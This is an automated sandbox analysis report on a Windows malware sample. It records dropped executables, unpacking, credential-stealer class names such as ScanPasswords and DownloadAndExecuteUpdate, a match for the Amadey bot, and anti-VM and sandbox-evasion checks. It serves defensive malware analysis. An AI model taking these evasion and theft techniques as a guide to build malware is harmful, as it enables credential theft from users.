                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A70A.tmp
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_01
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6636
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_01
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCommand line argument: WA
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: QMn13jz6nj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: EE61.exe, 0000001F.00000000.557886650.0000000000400000.00000040.00000001.sdmp, EE61.exe, 0000001F.00000000.560895556.0000000000400000.00000040.00000001.sdmp, EE61.exe, 0000001F.00000002.568131871.0000000000400000.00000040.00000001.sdmp
                        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.475546297.000000000488F000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: C:\yacopicugux28_yero\lub.pdb source: D466.exe, 00000013.00000000.431033742.0000000000416000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.444432688.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.563965098.0000000000A40000.00000002.00020000.sdmp
                        Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: C:\yacopicugux28_yero\lub.pdb02`e@ source: D466.exe, 00000013.00000000.431033742.0000000000416000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.444432688.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.563965098.0000000000A40000.00000002.00020000.sdmp
                        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.493989773.0000000004B5D000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdbs|=M source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: =C:\xida\wimuhiwepivuz suv.pdb source: AA02.exe, 00000016.00000000.439528441.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: C:\xida\wimuhiwepivuz suv.pdb source: AA02.exe, 00000016.00000000.439528441.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: efDC:\duluh.pdb02`e@ source: QMn13jz6nj.exe, 00000000.00000002.303636479.0000000000415000.00000002.00020000.sdmp, QMn13jz6nj.exe, 00000000.00000000.297090292.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000000.401591547.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000002.421779029.0000000000415000.00000002.00020000.sdmp
                        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: msimg32.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: C:\duluh.pdb source: QMn13jz6nj.exe, 00000000.00000002.303636479.0000000000415000.00000002.00020000.sdmp, QMn13jz6nj.exe, 00000000.00000000.297090292.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000000.401591547.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000002.421779029.0000000000415000.00000002.00020000.sdmp
                        Source: Binary string: C:\tok\micuh.pdb source: B6B5.exe, 00000019.00000000.448563265.0000000000401000.00000020.00020000.sdmp, B6B5.exe, 00000019.00000002.490272528.0000000000401000.00000020.00020000.sdmp, B6B5.exe, 0000001C.00000000.478287829.0000000000401000.00000020.00020000.sdmp

                        Data Obfuscation:

                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeUnpacked PE file: 22.2.AA02.exe.400000.0.unpack
                        Detected unpacking (changes PE section rights)
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeUnpacked PE file: 11.2.A70A.exe.12e0000.0.unpack Unknown_Section0:ER;Unknown_Section1:W;.rsrc:R;Unknown_Section3:EW; vs Unknown_Section0:ER;Unknown_Section1:W;.rsrc:R;
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeUnpacked PE file: 22.2.AA02.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_00403215 push ecx; ret
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00401880 push esi; iretd
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402E94 push es; iretd
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_02BC3C01 push esi; ret
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_02BC3C66 push esi; ret
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04793634 push es; iretd
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00401880 push esi; iretd
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E1039 push B70F6E7Bh; iretd
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EA244 push 0000006Ah; retf
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EA2AE push 0000006Ah; retf
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EA2AC push 0000006Ah; retf
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013DF76E push esi; ret
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E1ED4 push edi; retn 000Ch
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_009041AC push eax; retf 0005h
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004146F5 push ecx; ret
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0043F228 push ss; iretd
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00896ED6 push esp; ret
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_009941AC push eax; retf 0005h
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_02AC3CAF push esp; iretd
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_05DEB490 pushad ; ret
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_05DEFCF3 push 14057209h; retf
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_004087FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                        Source: A70A.exe.4.drStatic PE information: 0xD8CC78B8 [Thu Apr 5 03:15:04 2085 UTC]
                        Source: QMn13jz6nj.exeStatic PE information: section name: .livucuc
                        Source: QMn13jz6nj.exeStatic PE information: section name: .vuf
                        Source: QMn13jz6nj.exeStatic PE information: section name: .duha
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: D466.exe.4.drStatic PE information: section name: .fefeg
                        Source: D466.exe.4.drStatic PE information: section name: .guyus
                        Source: D466.exe.4.drStatic PE information: section name: .venu
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name: .themida
                        Source: D375.exe.4.drStatic PE information: section name: .boot
                        Source: ddigjgj.4.drStatic PE information: section name: .livucuc
                        Source: ddigjgj.4.drStatic PE information: section name: .vuf
                        Source: ddigjgj.4.drStatic PE information: section name: .duha
                        Source: sqlite3.dll.22.drStatic PE information: section name: /4
                        Source: sqlite3.dll.22.drStatic PE information: section name: /19
                        Source: sqlite3.dll.22.drStatic PE information: section name: /35
                        Source: sqlite3.dll.22.drStatic PE information: section name: /51
                        Source: sqlite3.dll.22.drStatic PE information: section name: /63
                        Source: sqlite3.dll.22.drStatic PE information: section name: /77
                        Source: sqlite3.dll.22.drStatic PE information: section name: /89
                        Source: sqlite3.dll.22.drStatic PE information: section name: /102
                        Source: sqlite3.dll.22.drStatic PE information: section name: /113
                        Source: sqlite3.dll.22.drStatic PE information: section name: /124
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /4
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /19
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /35
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /51
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /63
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /77
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /89
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /102
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /113
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /124
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.46968213296
                        Source: initial sampleStatic PE information: section name: entropy: 7.99958739292
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.47748148421
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.03139365729
                        Source: initial sampleStatic PE information: section name: .text entropy: 6.94028321372
                        Source: initial sampleStatic PE information: section name: entropy: 7.97546579113
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.25113586904
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.46968213296
                        Source: 11.2.A70A.exe.12e0000.0.unpack, EntityCreator.csHigh entropy of concatenated method names: 'S??n', 'ScanPasswords', 'ScanCook', 'ScanFills', 'GetEntityCards', 'ReadRawData', 'ReadKey', 'MakeTries', 'EQQhVK0sySfSn9K9JZ', 'N71KZf1SWv1K2GDC5d'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.csHigh entropy of concatenated method names: '.cctor', 'gXrXJmbBk0fMg', 'VHnWmDmvPp', 'THRWAqJ2n8', 'SaxWJ28jWa', 'dvfWrrM8Ye', 'FPBWpsy6DI', 'lXgWI9Kghy', 'HsGWZme8nA', 'h0oWKi8BXG'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, FileZilla.csHigh entropy of concatenated method names: 'Scan', 'ScanCredentials', 'GetRecent', '.ctor', 'p35QMACOYsl47ibQuI', 'ePtFWMQSIhC0rn8m8W', 'R9DrRkkvQMHKMD0yqu', 'LEItYPRrklTjOdjHn8', 'VCoQdvm5lquKbRtw9c', 'XCunvihoIDluNWhDmU'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, CryptoHelper.csHigh entropy of concatenated method names: 'DecryptBlob', 'DecryptBlob', 'GetMd5Hash', 'GetHexString', 'oxpwRrHA7MtDBxSIru', 'Wt4xfA6vQLqOEQQNkl', 'HElv60jaJ8nsEr1lEN', 'hCQBb79rvYiWNO2DMT', 'KCJr4olaAr9jk2boMp', 'IhuDrrzFi7G6oWiNAf'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, NVP6cvsRm8LVKY2UGDp/dh5sYbsOQPvuwVEurZ3.csHigh entropy of concatenated method names: 'vVgkCk9peD', 'eBxqprrF8', 'LYQkSK2xW1', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'q4216ROghthnQHI5Mi', 'emXmspdyyJcJGsF0mk', 'q3PyHOVXHKKBqYCLdI', 'P8len2HbpjXgcuKmsm'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, SystemInfoHelper.csHigh entropy of concatenated method names: 'CreateBind', 'GetProcessors', 'GetGraphicCards', 'GetBrowsers', 'GetSerialNumber', 'ListOfProcesses', 'GetVs', 'GetProcessesByName', 'ListOfPrograms', 'AvailableLanguages'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, DownloadAndExecuteUpdate.csHigh entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'suCGZrgDquXtlnEU7PW', 'h1iJkRg4mk3lrbYRppI', 'xM4TErgyseDCOHyUlkR', 'tKb9k7gVpw5Vd8bDCaH', 'Xox03xgAXbFK73KqDBQ', 'N1C9TGgZGLfpmyueXSL', 'YISawpgBuhj5vmBy2dI'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, StringDecrypt.csHigh entropy of concatenated method names: 'Xor', 'FromBase64', 'BytesToStringConverted', 'Read', 'ghoRf92gfNog3T9p6kA', 'wUohRm2d2P26SHynAUm', 'uQeqla2o5hVxcSOrh8L', 'uPlOXQ22GGRNrpnOJjq', 'ceqq1M2JNoJRnyYmRPs', 'TnY1Ph2KJe7YqLpSP96'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, DesktopMessanger.csHigh entropy of concatenated method names: 'get_PassedPaths', 'set_PassedPaths', 'GetFolder', 'GetScanArgs', '.ctor', 'JDRJATJH8OsfAdRcXoU', 'GT8CtBJ6RU61J5dVXcR', 'nLbmJNJjb1O8aXmL2iJ', 'WObcxCJzgvpQlsvWcV8', 'PZKMpfgY3nXaWHFSaNL'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, FullInfoSender.csHigh entropy of concatenated method names: '.ctor', 'Send', 'sdfk8h34', 'Visible', 'asdk9y3', 'kadsoji83', 'kkdhfakdasd', 'sdfm83kjasd', 'sdfkas83', 'gkdsi8y234'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, Extensions.csHigh entropy of concatenated method names: 'ReadFile', 'ReadFileAsText', 'ChangeType', 'StripQuotes', 'DomainExists', 'PreCheck', 'sr4nxed2gajXEy6V6v3', 'IgFQ4fdJwdwfGXnXjK1', 'qifPHadg3fjdncPffFK', 'ltFUj4gz3op6nbcJlbG'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, TaskResolver.csHigh entropy of concatenated method names: '.ctor', 'get_Result', 'ReleaseUpdates', 'V0m281g9YIM4NbYDSha', 'AsE6jcglQi2iDoG9Uqi', 'kwUSnbgHZLVsMd2PiwR', 'GUJ8n3g6xBc6RbaApvU', 'WinHfOgM2rluFJ2EYT0', 'ipVybUgwKLmQrLxQ9qN'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, IPv4Helper.csHigh entropy of concatenated method names: 'IsLocalIp', 'GetDefaultIPv4Address', 'Request', 'l6wgX0dmeglkHJ0WPMy', 'Y98T2IdhCOMvBEtyswu', 'u07E63dkK7KQsv6UfkC', 'NUDS7adRiWPUSIrpwkA', 'dNXam6dTeWI9CfTKAHX', 'k0N7SJdvqtsUlBhKKt7', 'OcvvkVdEOFt3WV8LRWT'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, GdiHelper.csHigh entropy of concatenated method names: 'GetCaps', 'GetWindowsScreenScalingFactor', 'MonitorSize', 'GetImageBase', 'ConvertToBytes', 'pI7r7Md3soxSL9mb8KT', 'r4XL9hdtk8GlgbO4lV1', 'AdGD67dNXHCPifdiUjC', 'gtxaWkdao542VDfu7cK', 'hg7b6fdO0cE9xI9o5eN'

                        Persistence and Installation Behavior:

                        Yara detected Amadey bot
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile created: C:\ProgramData\sqlite3.dll
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ddigjgj
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D466.exe
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EE61.exe
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D375.exe
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\AA02.exe
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A70A.exe
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C169.exe

                        Hooking and other Techniques for Hiding and Protection:

                        Deletes itself after installation
                        Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\qmn13jz6nj.exe
                        Hides that the sample has been downloaded from the Internet (zone.identifier)
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ddigjgj:Zone.Identifier read attributes | delete
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040C0B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetP
rocAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        Tries to evade analysis by execution special instruction which cause usermode exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 00000000013DFC16 instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 0000000003301BEA instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 0000000003302759 instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 00000000033109BD instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 000000000330EE36 instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 00000000033184F6 instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 0000000003318B2D instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 000000000330543F instructions 0F3F070B33C033D23945080F95C264 caused by: Unknown instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 00000000033054AC instructions 0FC7C8 caused by: Known instruction #UD exception
                        Query firmware table information (likely to detect VMs)
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeSystem information queried: FirmwareTableInformation
                        Tries to detect sandboxes / dynamic malware analysis system (registry check)
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: ddigjgj, 00000009.00000002.435857331.000000000075B000.00000004.00000020.sdmpBinary or memory string: ASWHOOKL
                        Checks if the current machine is a virtual machine (disk enumeration)
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Roaming\ddigjgjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Contains functionality to detect sleep reduction / modifications
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004065D0
                        Source: C:\Windows\explorer.exe TID: 6548Thread sleep count: 585 > 30
                        Source: C:\Windows\explorer.exe TID: 6536Thread sleep count: 172 > 30
                        Source: C:\Windows\explorer.exe TID: 6540Thread sleep count: 241 > 30
                        Source: C:\Windows\explorer.exe TID: 6568Thread sleep count: 352 > 30
                        Source: C:\Windows\explorer.exe TID: 6576Thread sleep count: 131 > 30
                        Source: C:\Windows\explorer.exe TID: 4768Thread sleep count: 81 > 30
                        Source: C:\Users\user\AppData\Local\Temp\C169.exe TID: 2236Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe TID: 4000Thread sleep count: 115 > 30
                        Source: C:\Users\user\AppData\Local\Temp\D375.exe TID: 6020Thread sleep time: -36000s >= -30000s
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 1768Thread sleep count: 31 > 30
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
